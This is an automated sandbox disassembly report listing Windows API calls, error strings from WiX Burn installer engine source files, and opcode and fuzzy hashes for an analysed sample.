                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: DisplayVersion$Failed to compare versions.$Failed to open registry key: %ls.$Failed to read DisplayVersion.$Failed to read QuietUninstallString.$QuietUninstallString$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp
                                                                                                                                                                  • API String ID: 3535843008-915021512
                                                                                                                                                                  • Opcode ID: f09cd850abcb3fb4aebd0b3b75913dc55d8916cd1597b5a4b7b74d1af49e4405
                                                                                                                                                                  • Instruction ID: 367786490362baeca9ad03c8393230ee2e79b81b442a054e70047e052ff964ad
                                                                                                                                                                  • Opcode Fuzzy Hash: f09cd850abcb3fb4aebd0b3b75913dc55d8916cd1597b5a4b7b74d1af49e4405
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D512931E40215FBDF299F68CC42FAEB6B8BF04B04F554524B914AB290D3B49D80D690
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,?,00000000), ref: 00976212
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to update pending file renames., xrefs: 009761DD
                                                                                                                                                                  • Failed to open pending file rename registry key., xrefs: 009760C7
                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 009760E8, 009761CA
                                                                                                                                                                  • Failed to read pending file renames., xrefs: 00976114
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00976085
                                                                                                                                                                  • Failed to compare path from pending file rename to check path., xrefs: 00976221
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp, xrefs: 009761EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to compare path from pending file rename to check path.$Failed to open pending file rename registry key.$Failed to read pending file renames.$Failed to update pending file renames.$PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp
                                                                                                                                                                  • API String ID: 3535843008-1055086927
                                                                                                                                                                  • Opcode ID: c9bac0d8480c082221bcbc696b619fbeac6affa5e1fcfadf22731e335e5c83fa
                                                                                                                                                                  • Instruction ID: 1786f0935e5c527a0caf7748f3368dcb2e16e63f013be5c6aa11a8fe87dcf73a
                                                                                                                                                                  • Opcode Fuzzy Hash: c9bac0d8480c082221bcbc696b619fbeac6affa5e1fcfadf22731e335e5c83fa
                                                                                                                                                                  • Instruction Fuzzy Hash: CB51D832F44615FBCB319E59CC4AFAEBBBCAF41700F558559A508BB292D6719E00CB90
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00925C41: CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,?,000000FF), ref: 00925C6E
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00937566
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to find package: %ls$Failed to read compatible package id.$Failed to read package id.$Failed to remove from cache compatible package: %ls$Package '%ls' has no compatible package to clean.$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                  • API String ID: 1825529933-529956491
                                                                                                                                                                  • Opcode ID: 6eb4ab17cde77d4bdb4bf59dbb6499322a20e4bc408da1d4e7c976f9be97725f
                                                                                                                                                                  • Instruction ID: 6b6cd1a88ba8a52f953b5cd2f6479d589f8b28395bf654d103bf9c2d5d8fcef5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6eb4ab17cde77d4bdb4bf59dbb6499322a20e4bc408da1d4e7c976f9be97725f
                                                                                                                                                                  • Instruction Fuzzy Hash: 004135B1B4425DBBEF21AA94CC46FEFBA78EB44710F104511FA11BA1D0D2B19E50DBA0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009739DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739F5
                                                                                                                                                                    • Part of subcall function 009739DD: GetLastError.KERNEL32(?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739FF
                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009784E8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLastPointerWrite
                                                                                                                                                                  • String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 972348794-1106238538
                                                                                                                                                                  • Opcode ID: 635d9c60b8c0c5c92e634c749507d8df8624b0ad9c9a124a2a36f0bea6989af8
                                                                                                                                                                  • Instruction ID: 68afe51a1736fc68ce76365bbec9c4233c2fc632f2c5cf0db063216e0a2ee2bd
                                                                                                                                                                  • Opcode Fuzzy Hash: 635d9c60b8c0c5c92e634c749507d8df8624b0ad9c9a124a2a36f0bea6989af8
                                                                                                                                                                  • Instruction Fuzzy Hash: B841E873A80219BBEB214E84CC4EFAF7A6CAF44B54F058195BD08B6190EB74DD5096E0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091165F: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0093EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00911673
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000002,?,00000000,000000FF,00000000), ref: 009165FF
                                                                                                                                                                  • ResetEvent.KERNEL32(?), ref: 00916615
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0091661F
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00916629
                                                                                                                                                                    • Part of subcall function 0096B324: EnterCriticalSection.KERNEL32(009AD4F0,00000000,?,00918067,00000000,00000000,?,?,?,?,?,?,?), ref: 0096B32E
                                                                                                                                                                    • Part of subcall function 0096B324: LeaveCriticalSection.KERNEL32(009AD4F0,?,00918067,00000000,00000000,?,?,?,?,?,?,?), ref: 0096B345
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to wait for log thread events, signaled: %u., xrefs: 009166DD
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 009166A6, 009166C2, 009166EF
                                                                                                                                                                  • Failed to wait log message over pipe., xrefs: 00916666
                                                                                                                                                                  • Failed to reset log event., xrefs: 009166B0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$ErrorEventLastMultipleObjectsResetWait
                                                                                                                                                                  • String ID: Failed to reset log event.$Failed to wait for log thread events, signaled: %u.$Failed to wait log message over pipe.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3117541546-2819198451
                                                                                                                                                                  • Opcode ID: a74e6c48d42b6f80242686008f4683c585a69826d0eeb45fb997eef60b648bd4
                                                                                                                                                                  • Instruction ID: 74c9b3ea88238774648c09c6949ab58d2e1d74a06ef62ece7838d735f060bdd8
                                                                                                                                                                  • Opcode Fuzzy Hash: a74e6c48d42b6f80242686008f4683c585a69826d0eeb45fb997eef60b648bd4
                                                                                                                                                                  • Instruction Fuzzy Hash: 5641D731F40319BBEB20ABA48C47FEE7ABCAF54B95F104114B700B91C2D7B099D09AD5
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,0097E7E8,?,8000FFFF,8000FFFF,00020006,00000000,00000000,00000000,00000000,00000000,00000000,8000FFFF,?), ref: 00975735
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create the dependency registry key "%ls"., xrefs: 00975648
                                                                                                                                                                  • default, xrefs: 00975672
                                                                                                                                                                  • version.dll, xrefs: 009755E1
                                                                                                                                                                  • Failed to set the %ls registry value to %d., xrefs: 00975710
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975612, 0097571F
                                                                                                                                                                  • Failed to allocate the registry key for dependency "%ls"., xrefs: 00975603
                                                                                                                                                                  • Failed to set the %ls registry value to "%ls"., xrefs: 00975677, 009756AB, 009756DC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Closelstrlen
                                                                                                                                                                  • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp$default$version.dll
                                                                                                                                                                  • API String ID: 3903209405-20855631
                                                                                                                                                                  • Opcode ID: a72305a113a908713eb1336e086dd3f793ea1e5509bc151b617ff76d1090bcf5
                                                                                                                                                                  • Instruction ID: d05eebaa7f5795045ecb49994d4de60f05a660051195f8aebd175f34a478d0f1
                                                                                                                                                                  • Opcode Fuzzy Hash: a72305a113a908713eb1336e086dd3f793ea1e5509bc151b617ff76d1090bcf5
                                                                                                                                                                  • Instruction Fuzzy Hash: 5041C873B41A18FBDB226F948D46F9F7F75EB85B50F024154BA04791A1D2B14E10A790
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to determine length of relative path., xrefs: 0092FCEF
                                                                                                                                                                  • Failed to trim source folder., xrefs: 0092FD48
                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 0092FD5F, 0092FD65, 0092FDA3
                                                                                                                                                                  • Failed to determine length of source path., xrefs: 0092FCC5
                                                                                                                                                                  • Failed to set last source., xrefs: 0092FDB2
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092FDC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 0-3313679279
                                                                                                                                                                  • Opcode ID: c0585499c14b9bcb9b22d84dd83c563a78a44743b76687a4e0177d0407edf819
                                                                                                                                                                  • Instruction ID: 573e7ee474c6b34a2c3ecd3dbefa04fc421985974ac569cc3d310344ae02f775
                                                                                                                                                                  • Opcode Fuzzy Hash: c0585499c14b9bcb9b22d84dd83c563a78a44743b76687a4e0177d0407edf819
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F41EB32E40239BBDF22AA94DC56FDF7A79DB45B60F110671F510BA1D4D7B09940C790
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 009700C9
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009700D5
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009701C4
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009701CF
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00970107, 00970140
                                                                                                                                                                  • failed get_attributes, xrefs: 009700F8
                                                                                                                                                                  • failed get_nodeValue in XmlGetAttribute(%ls), xrefs: 0097016F
                                                                                                                                                                  • failed getNamedItem in XmlGetAttribute(%ls), xrefs: 00970131
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed getNamedItem in XmlGetAttribute(%ls)$failed get_attributes$failed get_nodeValue in XmlGetAttribute(%ls)
                                                                                                                                                                  • API String ID: 760788290-1291303398
                                                                                                                                                                  • Opcode ID: 0537b9faa3fe449d290587c554ecaa8f1abf3d798eba28a5c6b9605fc47167b8
                                                                                                                                                                  • Instruction ID: 7eb54fffe394239ebd0e0c6cf647a15d590b8b0ac64e56664793afb00f9b6c59
                                                                                                                                                                  • Opcode Fuzzy Hash: 0537b9faa3fe449d290587c554ecaa8f1abf3d798eba28a5c6b9605fc47167b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 6131C076704219EBDB059B54CC4AF6E77B9ABC9B11F058098F909AB2A1DB709E40CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000000,00000105,00000000,00000000,00000000,?,?,?,009147DC,?,00000000,00000000,00000000,0100147D), ref: 0091648B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                  • String ID: Failed to allocate space for current directory.$Failed to get current directory.$Failed to get max length of input buffer.$Failed to reallocate space for current directory.$GetCurrentDirectoryW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                                  • API String ID: 1611563598-979167295
                                                                                                                                                                  • Opcode ID: afc543c1b64c4b0d3d12962997435b416884566dd2af0edc6ec109a7bae871be
                                                                                                                                                                  • Instruction ID: 7fabf67d93359d445dcd139b21dc35dfafe65c1d536ff63e02098f239448be17
                                                                                                                                                                  • Opcode Fuzzy Hash: afc543c1b64c4b0d3d12962997435b416884566dd2af0edc6ec109a7bae871be
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31F4B2F4172D77E72156588C4AFEF6A6DAB85B90F014425B905BB2D0E1B4DC8096A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00916CF2,00000000,7D8B5756,00916CF2,00000000,00917162,00917162,00916DEA,00000000,00917162,00000000,00916DEA,00916CF2,00917162,00916DEA,00916EDE), ref: 00920814
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092081F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize file search., xrefs: 009207C3
                                                                                                                                                                  • Failed to set directory search path variable., xrefs: 00920850
                                                                                                                                                                  • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 009208AC
                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00920885
                                                                                                                                                                  • Failed to format variable string., xrefs: 009207FD
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 009207D5, 00920897
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to initialize file search.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 1799206407-3281098314
                                                                                                                                                                  • Opcode ID: 2d480a9fd12966187248923c3c5d5b0e4a84c62b5e824a7a2610092330be7cca
                                                                                                                                                                  • Instruction ID: 782ba913994d843c98dc7cd41abd9c30ac73017af6d6f2c44f231d4fa93ecd1f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d480a9fd12966187248923c3c5d5b0e4a84c62b5e824a7a2610092330be7cca
                                                                                                                                                                  • Instruction Fuzzy Hash: E2313D32E40639B7DB126A949C47F9F7E28AFC0720F110511F950B62D2E3719D5097D1
                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00949860,00000000,?), ref: 0097761D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00949860,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?,?), ref: 0097762B
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00949860,00000000,?), ref: 00977682
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00949860,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?,?), ref: 0097768C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ConfigErrorHeapLastQueryService$AllocateProcess
• String ID: Failed to allocate memory to get configuration.$Failed to query service configuration.$Failed to read service configuration.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\svcutil.cpp
• API String ID: 355237494-3172380343
APIs
• GetFileAttributesW.KERNEL32(00916CF2,00000000,7D8B5756,00916CF2,00000000,00917162,00917162,00916DEA,00000000,00917162,00000000,00916DEA,00916CF2), ref: 00920AA3
• GetLastError.KERNEL32 ref: 00920AAE
Strings
• Failed to initialize file search., xrefs: 00920A52
• Failed while searching file search: %ls, for path: %ls, xrefs: 00920ADC
• File search: %ls, did not find path: %ls, xrefs: 00920B33
• Failed to set variable to file search path., xrefs: 00920B17
• Failed to format variable string., xrefs: 00920A8C
• d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 00920A64, 00920AEE
Similarity
• API ID: AttributesErrorFileLast
• String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
• API String ID: 1799206407-4156759458
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 0095631B
• ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00956333
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0095637E
• ReleaseMutex.KERNEL32(?), ref: 00956395
• SetEvent.KERNEL32(?), ref: 0095639E
Strings
• Failed to send files in use message from netfx chainer., xrefs: 009563EF
• Failed to get message from netfx chainer., xrefs: 009563BF
• d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp, xrefs: 00956401
Similarity
• API ID: MutexObjectReleaseSingleWait$Event
• String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
• API String ID: 2608678126-3113603724
APIs
• CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,?,0095262E,00000000,00000000,00000000,?), ref: 00973AAF
• GetLastError.KERNEL32(?,0095262E,00000000,00000000,00000000,?,?,?,0094EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00973ABC
• GetLastError.KERNEL32(?,0095262E,00000000,00000000,00000000,?,?,?,0094EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00973ACE
Similarity
• API ID: ErrorLast$CreateFile
• String ID: Attempted to check filename, but no filename was provided$Failed to check size of file %ls by handle$Failed to open file %ls while checking file size$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
• API String ID: 1722934493-1003940733
APIs
• Part of subcall function 00927CE9: lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 00927D78
• RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
Similarity
• API ID: Closelstrlen
